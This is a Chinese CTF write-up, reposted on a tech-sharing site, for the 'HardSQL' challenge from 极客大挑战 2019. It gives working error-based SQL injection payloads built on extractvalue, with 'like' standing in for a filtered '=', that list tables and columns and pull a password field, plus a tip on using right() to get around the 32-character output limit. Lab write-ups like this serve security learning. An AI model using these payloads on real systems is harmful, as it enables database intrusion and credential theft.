ICode9

精准搜索请尝试: 精确搜索
首页 > 数据库> 文章详细

[极客大挑战 2019]HardSQL

2021-11-12 21:33:56  阅读:281  来源: 互联网

标签:极客 extractvalue HardSQL 0x7e 2019 select table concat schema


  • 首先拿到题目,使用 ' 进行尝试,发现输出了错误信息,直接使用报错注入的方式尝试

  • 在尝试的过程中发现过滤了=,这里我们可以使用like进行替换,然后就是正常的报错注入流程了

    1. 爆名

      admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())))))#
      
    2. 爆字段

      admin'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))#
      
    3. 查数据

      admin'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)))))#
      

这里最关键的点来了,我们爆出来的是部分flag

extractvalue和updatexml只显示32围字符

所以我们需要使用right()函数爆出右边的部分flag

标签:极客,extractvalue,HardSQL,0x7e,2019,select,table,concat,schema
来源: https://www.cnblogs.com/lzwhehe/p/15546487.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有